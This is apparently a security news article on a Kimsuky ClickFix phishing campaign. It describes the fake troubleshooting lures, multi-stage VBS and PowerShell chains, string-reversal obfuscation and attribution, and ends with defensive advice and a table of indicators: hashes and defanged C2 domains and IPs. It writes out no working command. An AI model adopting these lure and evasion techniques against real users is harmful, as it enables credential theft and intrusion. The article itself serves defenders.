Cybersecurity researchers at the Genians Security Center (GSC) identified a sophisticated campaign attributed to the North Korean APT group Kimsuky, leveraging the so-called “ClickFix” tactic to compromise target systems.
ClickFix, first documented by Proofpoint in April 2024, exploits user psychology by presenting seemingly legitimate troubleshooting instructions or security verification prompts, ultimately coercing victims into executing malicious PowerShell or script commands on their own devices.
Evolution of the ClickFix Tactic
The ClickFix method is a form of social engineering that disguises malicious intent behind plausible instructions, such as fixing browser errors or entering authentication codes.
Originally, it involved fake error messages on compromised websites, prompting users to copy and paste code into PowerShell.
Recent iterations have expanded to multilingual phishing emails, fake job portals, and even mimicked security interfaces of popular Korean web portals.
In each scenario, the user is manipulated into executing a pre-crafted command, typically obfuscated to evade detection and reverse-engineered analysis.
For instance, in a January 2025 spear-phishing attack, Kimsuky operatives impersonated a European journalist to lure a South Korean expert into opening a malicious Visual Basic Script (.vbs) file.
The script, delivered via an encrypted archive, executed a multi-stage payload: launching a decoy document, creating hidden directories, downloading further malware from a command-and-control (C2) server, and establishing persistence through scheduled tasks.
Obfuscation techniques, such as inserting random numeric strings and using reverse string transformations, were employed to bypass signature-based detection.
By March 2025, the group had shifted to a more refined ClickFix approach. Targets received phishing emails purportedly from aides to senior U.S. officials, containing multilingual manuals and code snippets.
According to Genians Security Center (GSC) Report, victims were instructed to paste obfuscated PowerShell commands often in reverse order into their consoles.
These commands, once executed, would contact C2 infrastructure, download additional payloads, and exfiltrate sensitive information.
Infrastructure and Attribution
Kimsuky’s infrastructure is characterized by a rotating set of C2 domains, often leveraging compromised or newly registered domains with plausible names.
Notable C2 addresses include konamo[.]xyz, raedom[.]store, kida.plusdocs.kro[.]kr, and others, spanning hosting providers in South Korea, the U.S., Japan, and beyond.
The threat group also utilizes cloud storage services (e.g., Google Drive, Proton Drive) for payload delivery and decoy content.
Linguistic analysis of phishing lures and web interfaces further supports attribution to North Korea, with the use of distinctive vocabulary and IT terminology consistent with North Korean dialects.
Additionally, the campaign’s technical indicators such as repeated use of the string “7539518426” for obfuscation, and the deployment of RATs like QuasarRAT align with known Kimsuky TTPs, particularly those observed in the ongoing “BabyShark” campaign.
The ClickFix tactic underscores the necessity of robust endpoint detection and response (EDR) solutions capable of behavioral analysis and real-time threat visibility.
Unlike traditional malware, ClickFix relies on user execution, making it less susceptible to conventional signature-based defenses.
EDR platforms, such as Genian EDR, can track process chains initiated by PowerShell, identify abnormal behaviors, and provide actionable intelligence for SOC teams.
Security awareness training remains crucial, as the attack hinges on social engineering. Users should be wary of unsolicited instructions to execute scripts or commands, especially those requiring administrative privileges.
Organizations are encouraged to update firewall blocklists with the latest IoCs and leverage threat intelligence to pivot and correlate related activity.
Indicators of Compromise (IoC)
| Type | Value/Hash/Domain/IP |
|---|---|
| MD5 | 56233bac07f4f9c43585e485e70b6169 |
| MD5 | a523bf5dca0f2a4ace0cf766d9225343 |
| MD5 | ad6104a503b46bf6ea505fe8b3182970 |
| MD5 | bf795a376233032d05766a396b3d6e08 |
| MD5 | ca13c54987293ae7efc22b14e1153c1e |
| MD5 | d10208c32fbbb5cacbd2097fc0dcd444 |
| MD5 | fc4c319d7940ad1b7c0477469420bd11 |
| MD5 | fcde319b752cacec40ffba130067de0d |
| MD5 | 8c33e8439844c315b7b3f21b0c1633aa |
| MD5 | 8ff155a2962c77e9da05bd0476af36be |
| MD5 | 12bfe00206b2e83c7ff79b657d3c56df |
| MD5 | 89a725b08ab0e8885fc03b543638be96 |
| MD5 | 627b856884604880a5c009ebf7173efb |
| MD5 | 913fe4236ca5e34879d2a3228da6b9c6 |
| Domain | konamo[.]xyz |
| Domain | raedom[.]store |
| Domain | kida.plusdocs.kro[.]kr |
| Domain | mspro.kro[.]kr |
| Domain | msprovider.menews.o-r[.]kr |
| Domain | account-profile.servepics[.]com |
| Domain | securedrive.fin-tech[.]com |
| Domain | securedrive.privatedns[.]org |
| Domain | securedrive.servehttp[.]com |
| Domain | androcl.csproject[.]org |
| Domain | login.androclesproject.o-r[.]kr |
| IP | 1.223.129[.]234 |
| IP | 103.149.98[.]247 |
| IP | 103.149.98[.]248 |
| IP | 106.243.157[.]158 |
| IP | 112.74.194[.]45 |
| IP | 115.92.4[.]123 |
| IP | 118.193.69[.]151 |
| IP | 121.179.161[.]231 |
| IP | 157.7.184[.]11 |
| IP | 162.0.229[.]227 |
| IP | 172.86.111[.]75 |
| IP | 210.179.30[.]213 |
| IP | 211.170.73[.]245 |
| IP | 38.180.157[.]197 |
| IP | 65.254.248[.]151 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
